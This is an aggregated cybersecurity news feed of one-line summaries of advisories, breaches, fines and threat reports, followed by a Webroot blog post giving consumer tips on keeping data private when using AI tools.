The EU Commission is offering over €210m ($227.3m) in funding for cybersecurity and digital skills programs through the Digital Europe Programme (DEP). About $38m will go towards projects protecting critical infrastructures.
Europol is proposing solutions to address challenges posed by privacy-enhancing technologies in Home Routing that impede law enforcement's ability to intercept communications in criminal investigations.
Cloud resources are increasingly targeted by cyberattacks, with SaaS applications, cloud storage, and cloud management infrastructure being the top categories of attack, according to Thales.
Exploiting these flaws could allow attackers to execute arbitrary commands, read source code, and gain unauthorized access. The vulnerabilities require authentication, with one flaw specifically requiring the built-in SSH server to be enabled.
Vinted, a prominent online platform for second-hand sales, has been fined €2,385,276 ($2,582,730) for violating the EU’s General Data Protection Regulation (GDPR) by not properly handling personal data deletion requests.
The expanding attack surface, with over 15 billion connected devices worldwide, raises concerns about privacy breaches for users. The average home now has 21 connected devices, facing more than 10 daily cyberattacks.
Team ARXU gained recognition earlier this year for targeting Romania over its support for Israel. The hacker group has a history of cyberattacks against Israel and its allies.
The emails falsely accuse recipients of sexual offences, using names and seals of authorities to appear authentic. Citizens are advised not to respond to such emails and report them to authorities.
Avast researchers have identified a cryptographic weakness in the DoNex ransomware and its previous versions, enabling them to create a decryptor for files encrypted by these variants.
Gentoo Linux Security Advisory 202407-22 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 115.9.1:esr are affected.
Debian Linux Security Advisory 5726-1 - Two vulnerabilities were discovered in the GSS message token handling in krb5, the MIT implementation of Kerberos. An attacker can take advantage of these flaws to bypass integrity protections or cause a denial of service.
Ubuntu Security Notice 6884-1 - Martin Kaesberger discovered that Nova incorrectly handled QCOW2 image processing. An authenticated user could use this issue to access arbitrary files on the server, possibly exposing sensitive information.
Ubuntu Security Notice 6883-1 - Martin Kaesberger discovered that Glance incorrectly handled QCOW2 image processing. An authenticated user could use this issue to access arbitrary files on the server, possibly exposing sensitive information.
Ubuntu Security Notice 6882-1 - Martin Kaesberger discovered that Cinder incorrectly handled QCOW2 image processing. An authenticated user could use this issue to access arbitrary files on the server, possibly exposing sensitive information.
VMware Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This is a proof of concept exploit.
Telerik Report Server deserialization and authentication bypass exploit chain that makes use of the vulnerabilities noted in CVE-2024-4358 and CVE-2024-1800.
Gentoo Linux Security Advisory 202407-21 - Multiple vulnerabilities have been discovered in the X.Org X11 library, the worst of which could lead to a denial of service. Versions greater than or equal to 1.8.7 are affected.
Gentoo Linux Security Advisory 202407-20 - A vulnerability has been discovered in KDE Plasma Workspaces, which can lead to privilege escalation. Versions greater than or equal to 5.27.11.1 are affected.
This whitepaper discusses eBPF technology in the Linux kernel and introduces the BPF Runtime Fuzzer (BRF), a fuzzer that can satisfy the semantics and dependencies required by the verifier and the eBPF subsystem.
Gentoo Linux Security Advisory 202407-19 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.11.0 are affected.
Gentoo Linux Security Advisory 202407-18 - A vulnerability has been discovered in Stellarium, which can lead to arbitrary file writes. Versions greater than or equal to 23.1 are affected.
Red Hat Security Advisory 2024-4353-03 - An update for the nodejs:16 package is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2024-4352-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Issues addressed include double free, memory leak, null pointer, spoofing, and use-after-free vulnerabilities.
Red Hat Security Advisory 2024-4351-03 - An update for the virt:rhel and virt-devel:rhel modules is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a use-after-free vulnerability.
Apple removed a number of virtual private network (VPN) apps in Russia from its App Store on July 4, 2024, following a request by Russia's state communications watchdog Roskomnadzor, Russian news media reported. This includes the mobile apps of 25 VPN service providers, including ProtonVPN, Red Shield VPN, NordVPN and Le VPN, according to MediaZona. It's worth noting that NordVPN previously shut
Four unpatched security flaws, including three critical ones, have been disclosed in the Gogs open-source, self-hosted Git service that could enable an authenticated attacker to breach susceptible instances, steal or wipe source code, and even plant backdoors. The vulnerabilities, according to SonarSource researchers Thomas Chauchefoin and Paul Gerste, are listed below - CVE-2024-39930 (CVSS
Events like the recent massive CDK ransomware attack – which shuttered car dealerships across the U.S. in late June 2024 – barely raise public eyebrows anymore. Yet businesses, and the people that lead them, are justifiably jittery. Every CISO knows that cybersecurity is an increasingly hot topic for executives and board members alike. And when the inevitable CISO/Board briefing rolls
Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz). That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware. Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal
A previously undocumented advanced persistent threat (APT) group dubbed CloudSorcerer has been observed targeting Russian government entities by leveraging cloud services for command-and-control (C2) and data exfiltration. Cybersecurity firm Kaspersky, which discovered the activity in May 2024, said the tradecraft adopted by the threat actor bears similarities with that of CloudWizard, but pointed
An analysis of information-stealing malware logs published on the dark web has led to the discovery of thousands of consumers of child sexual abuse material (CSAM), indicating how such information could be used to combat serious crimes. "Approximately 3,300 unique users were found with accounts on known CSAM sources," Recorded Future said in a proof-of-concept (PoC) report published last week. "
An emerging ransomware-as-a-service (RaaS) operation called Eldorado comes with locker variants to encrypt files on Windows and Linux systems. Eldorado first appeared on March 16, 2024, when an advertisement for the affiliate program was posted on the ransomware forum RAMP, Singapore-headquartered Group-IB said. The cybersecurity firm, which infiltrated the ransomware group, noted that its
OpenAI's ever-so-clever ChatGPT's software was doing something really-rather-stupid: storing users' chats on their Mac computers in plaintext. Read more in my article on the Hot for Security blog.
In recognition of its profound impact, July 16 is celebrated as Artificial Intelligence (AI) Appreciation Day. AI is one of the defining technologies of our era, and its adoption is skyrocketing. People are using AI tools like OpenAI’s ChatGPT and Microsoft Copilot for a wide range of personal applications. Indeed, AI is integrated into various aspects of our daily lives — from AI-powered apps that assist with language translation and personal finance management to tools that help with creative writing and music composition.

However, with the rapid growth of AI comes the pressing need to maintain privacy in our tech-driven world. As these intelligent systems become more capable and ubiquitous, they also collect vast amounts of data. Staying informed about the privacy practices of the AI tools you use and taking proactive steps to safeguard your information is crucial in navigating this new digital landscape. Here are some tips to help you keep your data private in our AI-enabled era:

Understand the technology
Imagine stepping into a futuristic world where robots and computers are your helpful companions. That’s our world today with AI! But as with any new tech, it’s crucial to know how it works. AI is evolving fast, so take some time to understand the basics. Knowing how AI algorithms function and the specific types of data they use is key to understanding how these systems make decisions.

Know the vendor’s privacy practices
Think of using an AI tool like choosing a new roommate. You wouldn’t want to live with someone who’s careless with your belongings, right? The same goes for your data privacy. Before you start using any AI tool, look into how the company handles your information. Are they safeguarding it, or selling it off to the highest bidder? A little research can help you find AI tools that respect your privacy.

Avoid inputting private data
Avoid sharing sensitive information like your address and phone number when interacting with AI tools. While it’s important to be cautious, remember that certain types of private data, such as preferences or non-sensitive information, can be safely shared with AI. Just as you wouldn’t divulge all your secrets to a new acquaintance, exercise discretion in what you share to ensure your privacy remains protected.

Use strong passwords
Think of your passwords as the locks on your doors. Weak locks are easy to pick, while strong ones keep intruders out. Create strong, unique passwords for your accounts, and use a reputable password manager like Webroot to keep track of them. This way, you won’t have to remember each one, and you can rest easy knowing your accounts are secure.

Keep software up-to-date
Imagine driving a car with outdated brakes — scary, right? Using outdated software is just as risky. Keep your AI-powered devices and services up-to-date. Software updates often include security patches and bug fixes that keep your data safe and your devices running smoothly.

Protect your devices
Your devices are like digital treasure chests, full of valuable information. Unfortunately, they’re also targets for cyber-attacks. AI-powered cyber threats are common and can wreak havoc on your systems. So strong antivirus protection is essential. Invest in a powerful solution like Webroot to keep the bad guys out and your devices safe.

Use two-factor authentication
Think of two-factor authentication (2FA) as a double lock on your front door. It adds an extra layer of security by requiring a second form of verification, like a text message or an app notification, along with your password. Enabling 2FA on your accounts makes it much harder for someone to break in, even if they know your password.

By following these tips, you can enjoy the wonders of AI without sacrificing your privacy. Stay informed, stay cautious, and stay protected! The future is bright with AI — just make sure you’re navigating it safely. Learn more about data protection.

The post 7 Tips on Keeping Your Data Private When Using AI appeared first on Webroot Blog.